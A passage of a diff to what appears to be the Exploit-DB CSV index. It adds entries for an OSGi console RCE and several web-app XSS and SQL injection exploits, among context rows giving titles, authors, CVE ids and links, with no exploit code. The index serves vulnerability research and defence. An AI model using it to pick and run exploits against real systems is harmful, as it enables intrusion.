(Authenticated)",2021-11-29,"Hubert Wojciechowski",webapps,multiple,,2021-11-29,2021-11-29,0,,,,,http://www.exploit-db.comos-php72-setup.zip, 46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comorientdb-3.0.17.zip, 46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comorientdb-3.0.17.zip, +51879,exploits/multiple/webapps/51879.py,"OSGi v3.7.2 (and below) Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,, +51878,exploits/multiple/webapps/51878.py,"OSGi v3.8-3.18 Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,, 24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,, 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/ 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494 @@ -12210,6 +12214,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,, 49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,, 49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, +51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,, 43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10 48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,, 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,, @@ -15830,6 +15835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,, 21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info 51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,, +51880,exploits/php/webapps/51880.txt,"Client Details System 1.0 - SQL Injection",2024-03-12,"Hamdi Sevben",webapps,php,,2024-03-12,2024-03-12,0,,,,,, 41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,, 48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,, 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,, @@ -19721,6 +19727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,, 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,, +51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,, 51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,, 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,, 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,